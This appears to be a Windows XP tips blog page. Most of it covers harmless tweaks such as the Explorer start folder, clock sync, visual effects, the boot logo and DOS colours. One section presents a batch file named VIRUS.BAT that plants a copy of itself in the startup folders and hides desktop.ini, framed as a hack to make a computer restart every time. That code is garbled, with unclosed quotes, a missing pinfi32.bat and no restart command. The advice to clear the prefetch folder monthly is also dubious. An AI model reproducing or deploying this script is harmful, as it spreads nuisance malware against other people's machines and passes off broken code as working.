Skip to main content

Posts

Showing posts with the label Advanced XP tricks

Change the Default Opening Folder in Windows Explorer

By default, Windows Explorer opens showing the My Documents folder. To change the default setting so that all top–level drives and folders are shown, follow these steps: Click Start > Programs > Accessories, then right–click Windows Explorer, and click Properties. Under Target field, which reads %SystemRoot%\explorer.exe, add to make the line read: %SystemRoot%\explorer.exe /n, /e, /select, C:\ Click OK. Learn some Internet Explorer tricks Learn to hack rapidshare

Do Not Highlight Newly Installed Programs

Tired of that annoying little window that pops up to tell you that new software is installed? If it gets in the way when you’re logging off, turn it off completely. To do this: Click Start, right-click at the top of the Start menu where your name is displayed, and then click Properties. In the Taskbar and Start Menu Properties dialog box, on the Start Menu tab, click Customize. Click the Advanced tab, and then clear the Highlight newly installed programs check box. • Click OK, and then click OK again.

Synchronize Your Computer Clock with an Internet Time Server

Does your computer have the right time? If your computer is not part of a domain, you can synchronize your computer clock with an Internet time server. To do so: Double–click the time on your task bar. Click the Internet Time tab. • Select the time server you want to use and make sure to select the Automatically synchronize with an Internet time server check box. Who is a hacker

Load Internet Explorer the Fastest Way Possible

Edit your link to start Internet Explorer to have -nohome after it. For Example: "C:\Program Files\Internet Explorer\IEXPLORE.EXE" -nohome This will load internet explorer very fast because it does not load a web page while it is loading. If you want to go to your homepage after it is loaded, just click on the home button. Send unlimited SMS from here

Performance Increase Through My Computer

Easy enough tweak to usually find out about it on your own, but still, some of us still don't find it right away. So here it is: • Start > right-click on My Computer and select Properties. Click on the "Advanced" tab. • See the "Performance" section? Click "Settings". • Disable the following: Fade or slide menus into view Fade or slide ToolTips into view Fade out menu items after clicking Show Shadows under menus Slide open combo boxes Slide taskbar buttons Use a background image for each folder type Use common tasks in folders There, now Windows will still look nice and perform faster. Make a good blogroll for your blog

Clean Your Prefetch to Improve Performance

This is a unique technique for WinXP. We know that it is necessary to scrub registry and TEMP files for Win9X/ME/2000 periodically. Prefetch is a new and very useful technique in Windows XP. However, after using XP some time, the prefetch directory can get full of junk and obsolete links in the Prefetch catalog, which can slow down your computer noticeably. • Open C(system drive):/windows/prefetch, delete those junk and obsolete files, reboot. It is recommended that you do this every month. Click here for more Smsgupshup tips

Disable your XP Boot Logo

It is possible to disable the XP splash screen, which will slightly speed up the overall boot process. Be aware that removing the splash screen will also cause you not to see any boot-up messages that might come up (chkdsk, convert ... ), but if your system runs without any problems then it should not matter. • Edit boot.ini. • Add " /noguiboot" right after "/fastdetect". Upon restarting, the splash screen will be gone. It can be re-enabled by removing the new switch. Know your visitor

A HACK TO RESTART A COMPUTER EVERY TIME

THIS IS A SIMPLE TRICK TO RESTART A COMPUTER ON EVERY START .YOU SHOULD HAVE A LITTLE KNOWLEDGE OF MS DOS .JUST CREATE A NEW FILE NAME VIRUS.BAT .IN THAT FILE PASTE EXACTLY WHAT I HAVE WRITTEN HERE @echo off for %%a IN (C:\documents and settings\all users\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\all users\start menu\programs\startup @echo off for %%a IN (C:\documents and settings\administrator\start menu\programs\startup\desktop.ini) DO COPY pinfi32.bat "C:\documents and settings\administrator\start menu\programs\startup cd c:\documents and settings\all users\start menu\programs\startup @echo off attrib desktop.ini +h +s cd\ @echo off exit This is a command sector for restart attributes.Don't try this in your computer. How Operating systems are getting hacked

How to Change your DOS Colour

Certain SYNTAX Sets the default dos foreground and background colors. COLOR [attr] attr Specifies color attribute of console output Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the below values. By adding any of the following values,you can simply change your DOS' color. 0 = Black 8 = Gray 1 = Blue 9 = Light Blue 2 = Green A = Light Green 3 = Aqua B = Light Aqua 4 = Red C = Light Red 5 = Purple D = Light Purple 6 = Yellow E = Light Yellow 7 = White F = Bright White If no argument is given, this command restores the color to what it was when CMD.EXE started. This value either comes from the current console window, the /T command line switch or from the Default Color registry value. The COLOR command sets ERROR LEVEL to 1 if an attempt is made to execute the COLOR command with a foreground and background color that are the same. Best SEO tips here